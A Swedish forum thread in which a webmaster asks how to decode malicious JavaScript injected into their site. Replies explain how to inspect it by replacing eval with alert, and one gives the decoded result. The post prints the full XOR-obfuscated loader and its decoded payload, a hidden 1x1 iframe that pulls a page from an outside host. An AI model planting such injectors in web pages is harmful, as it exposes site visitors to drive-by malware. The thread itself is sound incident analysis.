Permalänk

Dekryptera javascript

På en sida som jag är webbansvarig hos bliv för någon vecka sedan infekterad med ett javascript som i bakgrunden skickar besökaren till en annan sida med skadlig kod. Koden som utförde detta var:

Citat:

<script language='javascript'>function upnlluuaqunxe(gdecxjloyrefjqbjqjix, epetjalkmtins , fkgkntmxc ,uuvwgfalskasqn){var lzctz = "";for (var i = 0 ; i < gdecxjloyrefjqbjqjix.length; ++i) lzctz += fkgkntmxc(uuvwgfalskasqn ^(epetjalkmtins ^ gdecxjloyrefjqbjqjix.charCodeAt(i)));return lzctz;}var gdecxjloyrefjqbjqjix = "\xb0\x9d\x9a\xf4\xff\xf3\xe5\xfd\xf5\xfe\xe4\xbe\xe7\xe2\xf9\xe4\xf5\xb8\xb7\xac\xf4\xf9\xe6\xb0\xe3\xe4\xe9\xfc\xf5\xad\xb2\xe6\xf9\xe3\xf9\xf2\xf9\xfc\xf9\xe4\xe9\xaa\xf8\xf9\xf4\xf4\xf5\xfe\xb2\xae\xac\xf9\xf6\xe2\xf1\xfd\xf5\xb0\xe3\xe2\xf3\xad\xb2\xf8\xe4\xe4\xe0\xaa\xbf\xbf\xf1\xf2\xf2\xf5\xe9\xfc\xf9\xe4\xf8\xff\xf7\xe2\xf1\xe0\xf8\xf9\xf3\xbe\xf3\xff\xbe\xe5\xfb\xbf\xf9\xfd\xf1\xf7\xf5\xe3\xbf\xe2\xbe\xf8\xe4\xfd\xfc\xb2\xb0\xe7\xf9\xf4\xe4\xf8\xad\xa1\xb0\xf8\xf5\xf9\xf7\xf8\xe4\xad\xa1\xae\xac\xbf\xf9\xf6\xe2\xf1\xfd\xf5\xae\xac\xbf\xf4\xf9\xe6\xae\xb7\xb9\xab\x9d\x9a\x9d\x9a\x9d\x9a"; eval(upnlluuaqunxe(gdecxjloyrefjqbjqjix,94,String.fromCharCode,206));</script>

Som ni ser är koden oläsbar. Hur är den krypterad och går det att få fram koden? Jag skulle vilja få fram hela koden då jag är lite intresserad av att få se hur den ser ut och fungerar

Visa signatur

][- perfect -][

Permalänk
Medlem

Klistra in koden på en blank html sida och ändra eval() till alert() så ser du vad skriptet gör. Inget kommer hända då koden visas som text i en alert ruta.

Permalänk

Det som är encodad lyder:

document.write('<div style="visibility:hidden"><iframe src="http://abbeylithographic.co.uk/images/r.html" width=1 height=1></iframe></div>');

Så det är som att köra eval på det.

Visa signatur

Jag ser så dåligt när jag blundar. Jag ser nästan...nästan ingenting alls.

Permalänk

Ok, tack för svar!

Visa signatur

][- perfect -][

Permalänk
Medlem

iframes....

Satans påfund!

Visa signatur

ηλί, ηλί, λαμά σαβαχθανί!?